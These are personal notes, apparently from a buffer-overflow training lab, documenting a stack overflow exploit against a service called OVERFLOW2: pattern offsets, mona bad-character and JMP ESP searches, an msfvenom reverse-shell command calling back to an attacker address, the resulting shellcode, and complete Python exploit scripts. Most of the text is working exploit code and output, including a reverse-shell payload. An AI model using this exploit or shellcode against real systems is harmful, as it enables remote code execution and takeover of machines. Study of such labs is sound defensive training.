It’s the same thing as the prep 1, but I still writing it because it’s my notes.
Crashing at 630, it’s useless to be presice like this.
If you enter only “A” chars you won’t see the offset in the EIP, he need a patern.
https://wiremask.eu/tools/buffer-overflow-pattern-generator/
So it’s crashing between 600 and 700, let’s create a string of 300”A” + 400”patern”.
0x6c41316c offset 334
Offset 334, that’s mean 300”A” + 334”patern”.
So now I can do 300+334=634, “A”334 + “B”4
View > log (alt +l)!mona findmsp -distance 600
42424242 is my BBBB. So I found the EIP
Finding Bad Characters
For mona:
!mona bytearray -b "\x00"
For me:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
Restart the program then:
nc 10.10.35.232 1337 <<< "OVERFLOW2 "$(python -c 'print( "A"*634 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')
!mona compare -f C:\mona\oscp\bytearray.bin -a esp
I got it, it’s because i’m using bash and not python so maybe there is problem of encoding.
import socket
ip = "10.10.35.232"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
BadChars: \x00\x23\x3c\x83\xba
!mona bytearray -b "\x00\x23\x3c\x83\xba"
I modify my payload to remove the BadChars.
Find the jump point
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
So 625011af
= \xaf\x11\x50\x62
It will be our jmp
. we need to place it into the EIP, so instead the BBBB
prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
Gereate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4848 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c
Output:
"\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4";
exploit
import socket
ip = "10.10.35.232"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload=("\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
Indeed, it’s better when I use rhe right tools.
Conclusion
- Find where it’s craching (aproximatively)
- remove 200 chars, add 300 ofset to locate where in the ofset it’s crashing
- Add BBBB to be sure I’m at the EIP.
- Generate bytearray with mona and Inject the same after BBBB with the script (not working with bash)
- Find the bad chars
- Find the jump
- Create the payload without the BadChars
- add the jpm Value in EIP, the NOPS then the payload